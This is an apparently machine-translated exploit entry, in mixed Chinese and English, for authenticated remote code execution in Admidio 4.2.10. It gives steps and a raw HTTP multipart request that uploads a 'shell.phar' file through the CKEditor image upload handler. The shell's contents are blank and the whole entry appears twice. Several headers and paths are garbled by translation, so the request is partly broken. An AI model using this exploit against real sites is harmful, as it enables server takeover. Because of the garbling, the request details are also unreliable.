exploit title: admidio v4.2.10-远程代码执行(RCE)
Application: Admidio
版本: 4.2.10
BUGS: RCE
Technology: php
供应商URL: https://www.admidio.org/
软件link: https://www.admidio.org/download.php
发现日期: 10.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录帐户
2。去宣布
3。添加条目
4。上载.phar文件中的图像上传部分。
.phar文件内容
?
5。
请求:
post/admidio/adm_program/system/ckeditor_upload_handler.php?ckeditor=ann_descriptionckeditorfuncnum=1langCode=en http/1.1
HOST: LOCALHOST
内容长度: 378
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- WebKitFormBoundaryNenene9Truc1TaqHr86r
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-dest: iframe
Refureer: http://localhost/admidio/admdogram/program/program/aucecements/aucecements_new.php?headline=公告
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: umpidio_admidio_adm_cookieconsent_status=imply; admidio_admidio_adm_session_id=penqrouatvh0vmp8v2mdntrgdn; ckcsrftoken=O3TH5RCGHWXX2QAR157XX4Y1F7FQ42AYQ9TAV8MB
连接:关闭
------ webkitformboundarynenene9truc1taqhr86r
content-disposition: form-data; name='upload';文件名='shell.phar'
content-type:应用程序/钟表流
?
------ webkitformboundarynenene9truc1taqhr86r
content-disposition: form-data;名称='ckcsrftoken'
O3Th5rcGHWXX2QAR157XX4Y1F7FQ42AYQ9TAV8MB
------ webkitformboundarynenene9truc1taqhr86r--
Application: Admidio
版本: 4.2.10
BUGS: RCE
Technology: php
供应商URL: https://www.admidio.org/
软件link: https://www.admidio.org/download.php
发现日期: 10.07.2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
步骤:
1。登录帐户
2。去宣布
3。添加条目
4。上载.phar文件中的图像上传部分。
.phar文件内容
?
5。
请求:
post/admidio/adm_program/system/ckeditor_upload_handler.php?ckeditor=ann_descriptionckeditorfuncnum=1langCode=en http/1.1
HOST: LOCALHOST
内容长度: 378
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- WebKitFormBoundaryNenene9Truc1TaqHr86r
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-dest: iframe
Refureer: http://localhost/admidio/admdogram/program/program/aucecements/aucecements_new.php?headline=公告
Accept-incoding: Gzip,放气
Accept-Language: en-us,en; q=0.9
cookie: umpidio_admidio_adm_cookieconsent_status=imply; admidio_admidio_adm_session_id=penqrouatvh0vmp8v2mdntrgdn; ckcsrftoken=O3TH5RCGHWXX2QAR157XX4Y1F7FQ42AYQ9TAV8MB
连接:关闭
------ webkitformboundarynenene9truc1taqhr86r
content-disposition: form-data; name='upload';文件名='shell.phar'
content-type:应用程序/钟表流
?
------ webkitformboundarynenene9truc1taqhr86r
content-disposition: form-data;名称='ckcsrftoken'
O3Th5rcGHWXX2QAR157XX4Y1F7FQ42AYQ9TAV8MB
------ webkitformboundarynenene9truc1taqhr86r--
